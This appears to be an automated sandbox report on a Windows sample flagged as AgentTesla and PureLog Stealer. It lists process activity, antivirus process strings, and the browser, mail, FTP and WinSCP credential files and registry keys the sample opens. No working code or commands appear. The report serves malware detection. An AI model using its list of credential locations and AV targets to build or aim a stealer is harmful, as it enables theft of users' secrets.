Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	3_2_031C5ACC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	3_2_031CA7C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	3_2_031C5BD8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	3_2_031CA810
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: GetLocaleInfoA,	9_2_00417A20
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: GetLocaleInfoA,	9_1_00417A20
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	10_2_031A5ACC
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	10_2_031A5BD7
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: GetLocaleInfoA,	10_2_031AA810
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: GetLocaleInfoA,	11_2_00417A20
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: GetLocaleInfoA,	11_1_00417A20
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	16_2_03195ACC
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	16_2_03195BD7
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: GetLocaleInfoA,	16_2_0319A810

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_031C920C GetLocalTime,

3_2_031C920C

Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

Code function: 13_2_0040BBD4 GetTimeZoneInformation,

13_2_0040BBD4

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_031CB78C GetVersionExA,

3_2_031CB78C

Source: C:\Users\Public\Libraries\xrbjyllC.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933710309.00000000227AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037584251.0000000026FED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037584251.0000000026FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933710309.0000000022764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1885700149.0000000029CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: xrbjyllC.pif PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xrbjyllC.pif PID: 4108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xrbjyllC.pif PID: 6568, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini

Tries to harvest and steal ftp login credentials

Source: C:\Users\Public\Libraries\xrbjyllC.pif

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Yara detected Credential Stealer

Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
